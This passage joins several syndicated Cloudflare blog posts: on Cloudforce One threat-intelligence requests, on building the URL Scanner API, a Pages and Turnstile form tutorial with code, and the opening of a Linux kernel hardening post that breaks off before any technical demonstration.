Many of the products Cloudflare builds are a direct result of the challenges our own team is looking to address. Log Explorer is a perfect example of this culture of dogfooding. Optimistic concurrent writes require atomic updates in the underlying object store, and as a result of our needs, R2 added a PutIfAbsent operation with strong consistency. Thanks, R2! The atomic operation sets Log Explorer apart from Delta Lake solutions based on Amazon Web Services’ S3, which incur the operational burden of using an external store for synchronizing writes.

Log Explorer is written in the Rust programming language using open-source libraries, such as delta-rs, a native Rust implementation of the Delta Lake protocol, and Apache Arrow DataFusion, a very fast, extensible query engine. At Cloudflare, Rust has emerged as a popular choice for new product development due to its safety and performance benefits.

What’s next

We know that application security logs are only part of the puzzle in understanding what’s going on in your environment. Stay tuned for future developments including tighter, more seamless integration between Analytics and Log Explorer, the addition of more datasets including Zero Trust logs, the ability to define custom retention periods, and integrated custom alerting.

Please use the feedback link to let us know how Log Explorer is working for you and what else would help make your job easier.

How to get it

We’d love to hear from you! Let us know if you are interested in joining our Beta program by completing this form and a member of our team will contact you.

Pricing will be finalized prior to a General Availability (GA) launch.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams

2024-03-08 Javier Castro

Post Syndicated from Javier Castro original https://blog.cloudflare.com/threat-intel-rfi-pir

Cloudforce One is our threat operations and research team. Its primary objective: track and disrupt threat actors targeting Cloudflare and the customer systems we protect. Cloudforce One customers can engage directly with analysts on the team to help understand and stop the specific threats targeting them.

Today, we are releasing in general availability two new tools that will help Cloudforce One customers get the best value out of the service by helping us prioritize and organize the information that matters most to them: Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs). We’d also like to review how we’ve used the Cloudflare Workers and Pages platform to build our internal pipeline to not only perform investigations on behalf of our customers, but conduct our own internal investigations of the threats and attackers we track.

What are Requests for Information (RFIs)?

RFIs are designed to streamline the process of accessing critical intelligence. They provide an avenue for users to submit specific queries and requests directly into Cloudforce One’s analysis queue. Essentially, they are a well-structured way for you to tell the team what to focus their research on to best support your security posture.

Each RFI filed is routed to an analyst and treated as a targeted call for information on specific threat elements. From malware analysis to DDoS attack analysis, we have a group of seasoned threat analysts who can provide deeper insight into a wide array of attacks. Those who have found RFIs invaluable typically belong to Security Operation Centers, Incident Response Teams, and Threat Research/Intelligence teams dedicated to supporting internal investigations within an organization. This approach proves instrumental in unveiling potential vulnerabilities and enhancing the understanding of the security posture, especially when confronting complex risks.

Creating an RFI is straightforward. Through the Security Center dashboard, users can create and track their RFIs:

Submission: Submit requests via Cloudforce One RFI Dashboard:
a. Threat: The threat or campaign you would like more information on
b. Priority: routine, high or urgent
c. Type: Binary Analysis, Indicator Analysis, Traffic Analysis, Threat Detection Signature, Passive DNS Resolution, DDoS Attack or Vulnerability
d. Output: Malware Analysis Report, Indicators of Compromise, or Threat Research Report
Tracking: Our Threat Research team begins work and the customer can track progress (open, in progress, pending, published, complete) via the RFI Dashboard. Automated alerts are sent to the customer with each status change.
Delivery: Customers can access/download the RFI response via the RFI Dashboard.

*Fabricated example of the detailed view of an RFI and communication with the Cloudflare Threat Research Team*

Once an RFI is submitted, teams can stay informed about the progress of their requests through automated alerts. These alerts, generated when a Cloudforce One analyst has completed the request, are delivered directly to the user’s email or to a team chat channel via a webhook.

What are Priority Intelligence Requirements (PIRs)?

Priority Intelligence Requirements (PIRs) are a structured approach to identifying intelligence gaps, formulating precise requirements, and organizing them into categories that align with Cloudforce One’s overarching goals. For example, you can create a PIR signaling to the Cloudforce One team what topic you would like more information on.

*PIR dashboard with fictitious examples of priority intelligence requirements*

PIRs help target your intelligence collection efforts toward the most relevant insights, enabling you to make informed decisions and strengthen your organization’s cybersecurity posture.

While PIRs currently offer a framework for prioritizing intelligence requirements, our vision extends beyond static requirements. Looking ahead, our plan is to evolve PIRs into dynamic tools that integrate real-time intelligence from Cloudforce One. Enriching PIRs by integrating them with real-time intelligence from Cloudforce One will provide immediate insights into your Cloudflare environment, facilitating a direct and meaningful connection between ongoing threat intelligence and your predefined intelligence needs.

What drives Cloudforce One?

Since our inception, Cloudforce One has been actively collaborating with our Security Incident Response Team (SIRT) and Trust and Safety (T&S) team, aiming to provide valuable insights into attacks targeting Cloudflare and counteract the misuse of Cloudflare services. Throughout these investigations, we recognized the need for a centralized platform to capture insights from Cloudflare’s unique perspective on the Internet, aggregate data, and correlate reports.

In the past, our approach would have involved deploying a frontend UI and backend API in a core data center, leveraging common services like Postgres, Redis, and a Ceph storage solution. This conventional route would have entailed managing Docker deployments, constantly upgrading hosts for vulnerabilities, and dealing with a complex environment where we must juggle secrets, external service configurations, and maintaining availability.

Instead, we welcomed being Customer Zero for Cloudflare and fully embraced Cloudflare’s Workers and Pages platforms to construct a powerful threat investigation tool, and since then, we haven’t looked back. For anyone that has used Workers in the past, much of what we have done is not revolutionary, but almost commonplace given the ease of configuring and implementing the features in Cloudflare Workers. We routinely store file data in R2, metadata in KV, and indexed data in D1. That being said, we do have a few non-standard deployments as well, further outlined below.

Altogether, our Threats Investigation architecture consists of five services, four of which are deployed at the edge with the other one deployed in our core data centers due to data dependency constraints.

RFIs & PIRs: This API manages our formal Cloudforce One requests and customer priorities submitted via the Cloudflare Dashboard.
Threats: Our UI, deployed via Pages, serves as the interface for interacting with all of our Cloudforce One services, Cloudflare internal services, and the RFIs and PIRs submitted by our customers.
Cases: A case management system that allows analysts to store notes, Indicators of Compromise (IOCs), malware samples, and data analytics related to an attack. The service provides live updates to all analysts viewing the case, facilitating real-time collaboration. Each case is a Durable Object that is connected to via a Websocket that stores “files” and “file content” in the Durable Object’s persistent storage. Metadata for the case is made searchable via D1.
Leads: A queue of informal internal and external requests that may be reviewed by Cloudforce One when doing threat hunting discovery. Lead content is stored into KV, while metadata and extracted IOCs are stored in D1.
Binary DB: A raw binary file warehouse for any file we come across during our investigation. Binary DB also serves as the repository for malware samples used in some of our machine learning training. Each file is stored in R2, with its associated metadata stored in KV.

*Cloudforce One Threat Investigation Architecture*

At the heart of our Threats ecosystem is our case management service built on Workers and Durable Objects. We were inspired to build this tool because we often had to jump into collaborative documents that were not designed to store forensic data, organize it, mark sections with Traffic Light Protocol (TLP) releasability codes, and relate analysis to existing RFIs or Leads.

Our concept of cases is straightforward — each case is a Durable Object that can accept HTTP REST API or WebSocket connections. Upon initiating a WebSocket connection, it is seamlessly incorporated into the Durable Object’s in-memory state, allowing us to instantly broadcast real-time events to all users engaged with the case. Each case comprises distinct folders, each housing a collection of files containing content, releasability information, and file metadata.

Practically, our Durable Object leverages its persistent storage with each storage key prefixed with the value type: “case”, “folder”, or “file” followed by the UUID assigned to the file. Each case value has metadata associated with the case and a list of folders that belong to the case. Each folder has the folder’s name and a list of files that belong to it.

Our internal Threats UI helps us tie together the service integrations with our threat hunting analysis. It is here we do our day-to-day work which allows us to bring our unique insights into Cloudflare attacks. Below is an example of our Case Management in action where we tracked the RedAlerts attack before we formalized our analysis into the blog.

What good is all of this if we can’t search it? The Workers AI team launched Vectorize and enabled inference on the edge, so we decided to go all in on Workers and began indexing all case files as they’re being edited so that they can be searched. As each case file is being updated in the Durable Object, the content of the file is pushed to Cloudflare Queues. This data is consumed by an indexing engine consumer that does two things: extracts and indexes indicators of compromise, and embeds the content into a vector and pushes it into Vectorize. Both of the search mechanisms also pass the reference case and file identifiers so that the case may be found upon searching.

Given how easy it is to set up Workers AI, we took the final step of implementing a full Retrieval Augmented Generation (RAG) AI to allow analysts to ask questions about our previous analysis. Each question undergoes the same process as the content that is indexed. We pull out any indicators of compromise and embed the question into a vector, so we can use both results to search our indexes and Vectorize respectively, and provide the most relevant results for the request. Lastly, we send the vector data to a text-generation model using Workers AI that then returns a response to our analysts.

Using RFIs and PIRs

Imagine submitting an RFI for “Passive DNS Resolution – IOCs” and receiving real-time updates directly within the PIR, guiding your next steps.

Our workflow ensures that the intelligence you need is not only obtained but also used optimally. This approach empowers your team to tailor your intelligence gathering, strengthening your cybersecurity strategy and security posture.

Our mission for Cloudforce One is to equip organizations with the tools they need to stay one step ahead in the rapidly changing world of cybersecurity. The addition of RFIs and PIRs marks another milestone in this journey, empowering users with enhanced threat intelligence capabilities.

Getting started

Cloudforce One customers can already see the PIR and RFI Dashboard in their Security Center, and they can also use the API if they prefer that option. Click to see more documentation about our RFI and our PIR APIs.

If you’re looking to try out the new RFI and PIR capabilities within the Security Center, contact your Cloudflare account team or fill out this form and someone will be in touch. Finally, if you’re interested in joining the Cloudflare team, check out our open job postings here.

Cloudflare’s URL Scanner, new features, and the story of how we built it

2024-03-08 Sofia Cardita

Post Syndicated from Sofia Cardita original https://blog.cloudflare.com/building-urlscanner

Today, we’re excited to talk about URL Scanner, a tool that helps everyone from security teams to everyday users to detect and safeguard against malicious websites by scanning and analyzing them. URL Scanner has executed almost a million scans since its launch last March on Cloudflare Radar, driving us to continuously innovate and enhance its capabilities. Since that time, we have introduced unlisted scans, detailed malicious verdicts, enriched search functionality, and now, integration with Security Center and an official API, all built upon the robust foundation of Cloudflare Workers, Durable Objects, and the Browser Rendering API.

Integration with the Security Center in the Cloudflare Dashboard

Security Center is the single place in the Cloudflare Dashboard to map your attack surface, identify potential security risks, and mitigate risks with a few clicks. Its users can now access the URL scanner directly from the Investigate Portal, enhancing their cybersecurity workflow. These scans will be unlisted by default, ensuring privacy while facilitating a deep dive into website security. Users will be able to see their historic scans and access the related reports when they need to, and they will benefit from automatic screenshots for multiple screen sizes, enriching the context of each scan.

Customers with Cloudflare dashboard access will enjoy higher API limits and faster response times, crucial for agile security operations. Integration with internal workflows becomes seamless, allowing for sophisticated network and user protection strategies.

*Security Center in the Cloudflare Dashboard*

Unlocking the potential of the URL Scanner API

The URL Scanner API is a powerful asset for developers, enabling custom scans to detect phishing or malware risks, analyze website technologies, and much more. With new features like custom HTTP headers and multi-device screenshots, developers gain a comprehensive toolkit for thorough website assessment.

Submitting a scan request

Using the API, here’s the simplest way to submit a scan request:

curl --request POST \
	--url https://api.cloudflare.com/client/v4/accounts/<accountId>/urlscanner/scan \
	--header 'Content-Type: application/json' \
--header "Authorization: Bearer <API_TOKEN>" \
	--data '{
		"url": "https://www.cloudflare.com",
	}'

New features include the option to set custom HTTP headers, like User-Agent and Authorization, request multiple target device screenshots, like mobile and desktop, as well as set the visibility level to “unlisted”. This essentially marks the scan as private and was often requested by developers who wanted to keep their investigations confidential. Public scans, on the other hand, can be found by anyone through search and are useful to share results with the wider community. You can find more details in our developer documentation.

Exploring the scan results

*Scan results for* *www.cloudflare.com* *on Cloudflare Radar*

Once a scan concludes, fetch the final report and the full network log. Recently added features include the `verdict` property, indicating the site’s malicious status, and the `securityViolations` section detailing CSP or SRI policy breaches — as a developer, you can also scan your own website and see our recommendations. Expect improvements on verdict accuracy over time, as this is an area we’re focusing on.

Enhanced search functionality

Developers can now search scans by hostname, a specific URL or even any URL the page connected to during the scan. This allows, for example, to search for websites that use a JavaScript library named jquery.min.js (‘?path=jquery.min.js’). Future plans include additional features like searching by IP address, ASN, and malicious website categorisation.

The URL Scanner can be used for a diverse range of applications. These include capturing a website’s evolving state over time (such as tracking changes to the front page of an online newspaper), analyzing technologies employed by a website, preemptively assessing potential risks (as when scrutinizing shortened URLs), and supporting the investigation of persistent cybersecurity threats (such as identifying affected websites hosting a malicious JavaScript file).

How we built the URL Scanner API

In recounting the process of developing the URL Scanner, we aim to showcase the potential and versatility of Cloudflare Workers as a platform. This story is more than a technical journey, but a testament to the capabilities inherent in our platform’s suite of APIs. By dogfooding our own technology, we not only demonstrate confidence in its robustness but also encourage developers to harness the same capabilities for building sophisticated applications. The URL Scanner exemplifies how Cloudflare Workers, Durable Objects, and the Browser Rendering API seamlessly integrate.

*High level overview of the* *Cloudflare URL Scanner technology stack*

As seen above, Cloudflare’s runtime infrastructure is the foundation the system runs on. Cloudflare Workers serves the public API, Durable Objects handles orchestration, R2 acts as the primary storage solution, and Queues efficiently handles batch operations, all at the edge. However, what truly enables the URL Scanner’s capabilities is the Browser Rendering API. It’s what initially allowed us to release in such a short time frame, since we didn’t have to build and manage an entire fleet of Chrome browsers from scratch. We simply request a browser, and then using the well known Puppeteer library, instruct it to fetch the webpage and process it in the way we want. This API is at the heart of the entire system.

Scanning a website

The entire process of scanning a website, can be split into 4 phases:

Queue a scan
Browse to the website and compile initial report
Post-process: compile additional information and build final report
Store final report, ready for serving and searching

In short, we create a Durable Object, the Scanner, unique to each scan, which is responsible for orchestrating the scan from start to finish. Since we want to respond immediately to the user, we save the scan to the Durable Object’s transactional Key-Value storage, and schedule an alarm so we can perform the scan asynchronously a second later. We then respond to the user, informing them that the scan request was accepted.

When the Scanner’s alarm triggers, we enter the second phase:

There are 3 components at work in this phase, the Scanner, the Browser Pool and the Browser Controller, all Durable Objects.

In the initial release, for each new scan we would launch a brand-new browser. However, This operation would take time and was inefficient, so after review, we decided to reuse browsers across multiple scans. This is why we introduced both the Browser Pool and the Browser Controller components. The Browser Pool keeps track of what browsers we have open, when they last pinged the browser pool (so it knows they’re alive), and whether they’re free to accept a new scan. The Browser Controller is responsible for keeping the browser instance alive, once it’s launched, and orchestrating (ahem, puppeteering) the entire browsing session. Here’s a simplified version of our Browser Controller code:

export class BrowserController implements DurableObject {
	//[..]
	private async handleNewScan(url: string) {
		if (!this.browser) {
			// Launch browser: 1st request to durable object
			this.browser = await puppeteer.launch(this.env.BROWSER)
			await this.state.storage.setAlarm(Date.now() + 5 * 1000)
		}
		// Open new page and navigate to url
		const page = await this.browser.newPage()
		await page.goto(url, { waitUntil: 'networkidle2', timeout: 5000, })

		// Capture DOM
		const dom = await page.content()

		// Clean up
		await page.close()

		return {
			dom: dom,
		}
	}

	async alarm() {
		if (!this.browser) {
			return
		}
		await this.browser.version() // stop websocket connection to Chrome from going idle
		
		// ping browser pool, let it know we're alive
		
		// Keep durable object alive
		await this.state.storage.setAlarm(Date.now() + 5 * 1000)
	}
}

Launching a browser (Step 6) and maintaining a connection to it is abstracted away from us thanks to the Browser Rendering API. This API is responsible for all the infrastructure required to maintain a fleet of Chrome browsers, and led to a much quicker development and release of the URL Scanner. It also allowed us to use a well-known library, Puppeteer, to communicate with Google Chrome via the DevTools protocol.

The initial report is made up of the network log of all requests, captured in HAR (HTTP Archive) format. HAR files, essentially JSON files, provide a detailed record of all interactions between a web browser and a website. As an established standard in the industry, HAR files can be easily shared and analyzed using specialized tools. In addition to this network log, we augment our dataset with an array of other metadata, including base64-encoded screenshots which provide a snapshot of the website at the moment of the scan.

Having this data, we transition to phase 3, where the Scanner Durable Object initiates a series of interactions with a few other Cloudflare APIs in order to collect additional information, like running a phishing scanner over the web page’s Document Object Model (DOM), fetching DNS records, and extracting information about categories and Radar rank associated with the main hostname.

This process ensures that the final report is enriched with insights coming from different sources, making the URL Scanner more efficient in assessing websites. Once all the necessary information is collected, we compile the final report and store it as a JSON file within R2, Cloudflare’s object storage solution. To empower users with efficient scan searches, we use Postgres.

While the initial approach involved sending each completed scan promptly to the core API for immediate storage in Postgres, we realized that, as the rate of scans grew, a more efficient strategy would be to batch those operations, and for that, we use Worker Queues:

This allows us to better manage the write load on Postgres. We wanted scans available as soon as possible to those who requested them, but it’s ok if they’re only available in search results at a slightly later point in time (seconds to minutes, depending on load).

In short, Durable Objects together with the Browser Rendering API power the entire scanning process. Once that’s finished, the Cloudflare Worker serving the API will simply fetch it from R2 by ID. All together, Workers, Durable Objects, and R2 scale seamlessly and will allow us to grow as demand evolves.

Last but not least

While we’ve extensively covered the URL scanning workflow, we’ve yet to delve into the construction of the API worker itself. Developed with Typescript, it uses itty-router-openapi, a Javascript router with Open API 3 schema generation and validation, originally built for Radar, but that’s been improving ever since with contributions from the community. Here’s a quick example of how to set up an endpoint, with input validation built in:

import { DateOnly, OpenAPIRoute, Path, Str, OpenAPIRouter } from '@cloudflare/itty-router-openapi'

import { z } from 'zod'
import { OpenAPIRoute, OpenAPIRouter, Uuid } from '@cloudflare/itty-router-openapi'

export class ScanMetadataCreate extends OpenAPIRoute {
  static schema = {
    tags: ['Scans'],
    summary: 'Create Scan metadata',
    requestBody: {
      scan_id: Uuid,
      url: z.string().url(),
      destination_ip: z.string().ip(),
      timestamp: z.string().datetime(),
      console_logs: [z.string()],
    },
  }

  async handle(
    request: Request,
    env: any,
    context: any,
    data: any,
  ) {
    // Retrieve validated scan
    const newScanMetadata = data.body

    // Insert the scan

    // Return scan as json
    return newScanMetadata
  }
}


const router = OpenAPIRouter()
router.post('/scan/metadata/', ScanMetadataCreate)

// 404 for everything else
router.all('*', () => new Response('Not Found.', { status: 404 }))

export default {
  fetch: router.handle,
}

In the example above, the ScanMetadataCreate endpoint will make sure to validate the incoming POST data to match the defined schema before calling the ‘async handle(request,env,context,data)’ function. This way you can be sure that if your code is called, the data argument will always be validated and formatted.

You can learn more about the project on its GitHub page.

Future plans and new features

Looking ahead, we’re committed to further elevating the URL Scanner’s capabilities. Key upcoming features include geographic scans, where users can customize the location that the scan is done from, providing critical insights into regional security threats and content compliance; expanded scan details, including more comprehensive headers and security details; and continuous performance improvements and optimisations, so we can deliver faster scan results.

The evolution of the URL Scanner is a reflection of our commitment to Internet safety and innovation. Whether you’re a developer, a security professional, or simply invested in the safety of the digital landscape, the URL Scanner API offers a comprehensive suite of tools to enhance your efforts. Explore the new features today, and join us in shaping a safer Internet for everyone.

Remember, while Security Center’s new capabilities offer advanced tools for URL Scanning for Cloudflare’s existing customers, the URL Scanner remains accessible for basic scans to the public on Cloudflare Radar, ensuring our technology benefits a broad audience.

If you’re considering a new career direction, check out our open positions. We’re looking for individuals who want to help make the Internet better; learn more about our mission here.

Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin

2024-03-07 Sally Lee

Post Syndicated from Sally Lee original https://blog.cloudflare.com/guide-to-cloudflare-pages-and-turnstile-plugin

Balancing developer velocity and security against bots is a constant challenge. Deploying your changes as quickly and easily as possible is essential to stay ahead of your (or your customers’) needs and wants. Ensuring your website is safe from malicious bots — without degrading user experience with alien hieroglyphics to decipher just to prove that you are a human — is no small feat. With Pages and Turnstile, we’ll walk you through just how easy it is to have the best of both worlds!

Cloudflare Pages offer a seamless platform for deploying and scaling your websites with ease. You can get started right away with configuring your websites with a quick integration using your git provider, and get set up with unlimited requests, bandwidth, collaborators, and projects.

Cloudflare Turnstile is Cloudflare’s CAPTCHA alternative solution where your users don’t ever have to solve another puzzle to get to your website, no more stop lights and fire hydrants. You can protect your site without having to put your users through an annoying user experience. If you are already using another CAPTCHA service, we have made it easy for you to migrate over to Turnstile with minimal effort needed. Check out the Turnstile documentation to get started.

Alright, what are we building?

In this tutorial, we’ll walk you through integrating Cloudflare Pages with Turnstile to secure your website against bots. You’ll learn how to deploy Pages, embed the Turnstile widget, validate the token on the server side, and monitor Turnstile analytics. Let’s build upon this tutorial from Cloudflare’s developer docs, which outlines how to create an HTML form with Pages and Functions. We’ll also show you how to secure it by integrating with Turnstile, complete with client-side rendering and server-side validation, using the Turnstile Pages Plugin!

Step 1: Deploy your Pages

On the Cloudflare Dashboard, select your account and go to Workers & Pages to create a new Pages application with your git provider. Choose the repository where you cloned the tutorial project or any other repository that you want to use for this walkthrough.

The Build settings for this project is simple:

Framework preset: None
Build command: npm install @cloudflare/pages-plugin-turnstile
Build output directory: public

Once you select “Save and Deploy”, all the magic happens under the hood and voilà! The form is already deployed.

Step 2: Embed Turnstile widget

Now, let’s navigate to Turnstile and add the newly created Pages site.

Here are the widget configuration options:

Domain: All you need to do is add the domain for the Pages application. In this example, it’s “pages-turnstile-demo.pages.dev”. For each deployment, Pages generates a deployment specific preview subdomain. Turnstile covers all subdomains automatically, so your Turnstile widget will work as expected even in your previews. This is covered more extensively in our Turnstile domain management documentation.
Widget Mode: There are three types of widget modes you can choose from.
Managed: This is the recommended option where Cloudflare will decide when further validation through the checkbox interaction is required to confirm whether the user is a human or a bot. This is the mode we will be using in this tutorial.

Non-interactive: This mode does not require the user to interact and check the box of the widget. It is a non-intrusive mode where the widget is still visible to users but requires no added step in the user experience.

Invisible: Invisible mode is where the widget is not visible at all to users and runs in the background of your website.
Pre-Clearance setting: With a clearance cookie issued by the Turnstile widget, you can configure your website to verify every single request or once within a session. To learn more about implementing pre-clearance, check out this blog post.

Once you create your widget, you will be given a sitekey and a secret key. The sitekey is public and used to invoke the Turnstile widget on your site. The secret key should be stored safely for security purposes.

Let’s embed the widget above the Submit button. Your index.html should look like this:

<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf8">
		<title>Cloudflare Pages | Form Demo</title>
		<meta name="theme-color" content="#d86300">
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<link rel="icon" type="image/png" href="https://www.cloudflare.com/favicon-128.png">
		<link rel="stylesheet" href="/index.css">
		<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>
	</head>
	<body>

		<main>
			<h1>Demo: Form Submission</h1>

			<blockquote>
				<p>This is a demonstration of Cloudflare Pages with Turnstile.</p>
				<p>Pages deployed a <code>/public</code> directory, containing a HTML document (this webpage) and a <code>/functions</code> directory, which contains the Cloudflare Workers code for the API endpoint this <code>&lt;form&gt;</code> references.</p>
				<p><b>NOTE:</b> On form submission, the API endpoint responds with a JSON representation of the data. There is no JavaScript running in this example.</p>
			</blockquote>

			<form method="POST" action="/api/submit">
				<div class="input">
					<label for="name">Full Name</label>
					<input id="name" name="name" type="text" />
				</div>

				<div class="input">
					<label for="email">Email Address</label>
					<input id="email" name="email" type="email" />
				</div>

				<div class="input">
					<label for="referers">How did you hear about us?</label>
					<select id="referers" name="referers">
						<option hidden disabled selected value></option>
						<option value="Facebook">Facebook</option>
						<option value="Twitter">Twitter</option>
						<option value="Google">Google</option>
						<option value="Bing">Bing</option>
						<option value="Friends">Friends</option>
					</select>
				</div>

				<div class="checklist">
					<label>What are your favorite movies?</label>
					<ul>
						<li>
							<input id="m1" type="checkbox" name="movies" value="Space Jam" />
							<label for="m1">Space Jam</label>
						</li>
						<li>
							<input id="m2" type="checkbox" name="movies" value="Little Rascals" />
							<label for="m2">Little Rascals</label>
						</li>
						<li>
							<input id="m3" type="checkbox" name="movies" value="Frozen" />
							<label for="m3">Frozen</label>
						</li>
						<li>
							<input id="m4" type="checkbox" name="movies" value="Home Alone" />
							<label for="m4">Home Alone</label>
						</li>
					</ul>
				</div>
				<div id="turnstile-widget" style="padding-top: 20px;"></div>
				<button type="submit">Submit</button>
			</form>
		</main>
	<script>
	// This function is called when the Turnstile script is loaded and ready to be used.
	// The function name matches the "onload=..." parameter.
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
	</script>
	</body>
</html>

You can embed the Turnstile widget implicitly or explicitly. In this tutorial, we will explicitly embed the widget by injecting the JavaScript tag and related code, then specifying the placement of the widget.

<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>

<script>
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
</script>

Make sure that the div id you assign is the same as the id you specify in turnstile.render call. In this case, let’s use “turnstile-widget”. Once that’s done, you should see the widget show up on your site!

<div id="turnstile-widget" style="padding-top: 20px;"></div>

Step 3: Validate the token

Now that the Turnstile widget is rendered on the front end, let’s validate it on the server side and check out the Turnstile outcome. We need to make a call to the /siteverify API with the token in the submit function under ./functions/api/submit.js.

First, grab the token issued from Turnstile under cf-turnstile-response. Then, call the /siteverify API to ensure that the token is valid. In this tutorial, we’ll attach the Turnstile outcome to the response to verify everything is working well. You can decide on the expected behavior and where to direct the user based on the /siteverify response.

/**
 * POST /api/submit
 */

import turnstilePlugin from "@cloudflare/pages-plugin-turnstile";

// This is a demo secret key. In prod, we recommend you store
// your secret key(s) safely. 
const SECRET_KEY = '0x4AAAAAAASh4E5cwHGsTTePnwcPbnFru6Y';

export const onRequestPost = [
    turnstilePlugin({
    	secret: SECRET_KEY,
    }),
    (async (context) => {
    	// Request has been validated as coming from a human
    	const formData = await context.request.formData()

    	var tmp, outcome = {};
	for (let [key, value] of formData) {
		tmp = outcome[key];
		if (tmp === undefined) {
			outcome[key] = value;
		} else {
			outcome[key] = [].concat(tmp, value);
		}
	}

	// Attach Turnstile outcome to the response
	outcome["turnstile_outcome"] = context.data.turnstile;

	let pretty = JSON.stringify(outcome, null, 2);

      	return new Response(pretty, {
      		headers: {
      			'Content-Type': 'application/json;charset=utf-8'
      		}
      	});
    })
];

Since Turnstile accurately decided that the visitor was not a bot, the response for “success” is “true” and “interactive” is “false”. The “interactive” being “false” means that the checkbox was automatically checked by Cloudflare as the visitor was determined to be human. The user was seamlessly allowed access to the website without having to perform any additional actions. If the visitor looks suspicious, Turnstile will become interactive, requiring the visitor to actually click the checkbox to verify that they are not a bot. We used the managed mode in this tutorial but depending on your application logic, you can choose the widget mode that works best for you.

{
  "name": "Sally Lee",
  "email": "[email protected]",
  "referers": "Facebook",
  "movies": "Space Jam",
  "cf-turnstile-response": "0._OHpi7JVN7Xz4abJHo9xnK9JNlxKljOp51vKTjoOi6NR4ru_4MLWgmxt1rf75VxRO4_aesvBvYj8bgGxPyEttR1K2qbUdOiONJUd5HzgYEaD_x8fPYVU6uZPUCdWpM4FTFcxPAnqhTGBVdYshMEycXCVBqqLVdwSvY7Me-VJoge7QOStLOtGgQ9FaY4NVQK782mpPfgVujriDAEl4s5HSuVXmoladQlhQEK21KkWtA1B6603wQjlLkog9WqQc0_3QMiBZzZVnFsvh_NLDtOXykOFK2cba1mLLcADIZyhAho0mtmVD6YJFPd-q9iQFRCMmT2Sz00IToXz8cXBGYluKtxjJrq7uXsRrI5pUUThKgGKoHCGTd_ufuLDjDCUE367h5DhJkeMD9UsvQgr1MhH3TPUKP9coLVQxFY89X9t8RAhnzCLNeCRvj2g-GNVs4-MUYPomd9NOcEmSpklYwCgLQ.jyBeKkV_MS2YkK0ZRjUkMg.6845886eb30b58f15de056eeca6afab8110e3123aeb1c0d1abef21c4dd4a54a1",
  "turnstile_outcome": {
    "success": true,
    "error-codes": [],
    "challenge_ts": "2024-02-28T22:52:30.009Z",
    "hostname": "pages-turnstile-demo.pages.dev",
    "action": "",
    "cdata": "",
    "metadata": {
      "interactive": false
    }
  }
}

Wrapping up

Now that we’ve set up Turnstile, we can head to Turnstile analytics in the Cloudflare Dashboard to monitor the solve rate and widget traffic. Visitor Solve Rate indicates the percentage of visitors who successfully completed the Turnstile widget. A sudden drop in the Visitor Solve Rate could indicate an increase in bot traffic, as bots may fail to complete the challenge presented by the widget. API Solve Rate measures the percentage of visitors who successfully validated their token against the /siteverify API. Similar to the Visitor Solve Rate, a significant drop in the API Solve Rate may indicate an increase in bot activity, as bots may fail to validate their tokens. Widget Traffic provides insights into the nature of the traffic hitting your website. A high number of challenges requiring interaction may suggest that bots are attempting to access your site, while a high number of unsolved challenges could indicate that the Turnstile widget is effectively blocking suspicious traffic.

And that’s it! We’ve walked you through how to easily secure your Pages with Turnstile. Pages and Turnstile are currently available for free for every Cloudflare user to get started right away. If you are looking for a seamless and speedy developer experience to get a secure website up and running, protected by Turnstile, head over to the Cloudflare Dashboard today!

Linux kernel security tunables everyone should consider adopting

2024-03-06 Ignat Korchagin

Post Syndicated from Ignat Korchagin original https://blog.cloudflare.com/linux-kernel-hardening

The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does a bulk of work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.

In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.

Secure boot

When a machine (either a laptop or a server) boots, it goes through several boot stages:

Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.

We have previously covered how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.

Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous post about secure boot we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.

But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.

However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm installation), but with SELinux configured and enforced:

ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 12 (bookworm)
Release:	12
Codename:	bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing

Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that inside the kernel, the SELinux configuration is stored in a singleton structure, which is defined as follows:

struct selinux_state {
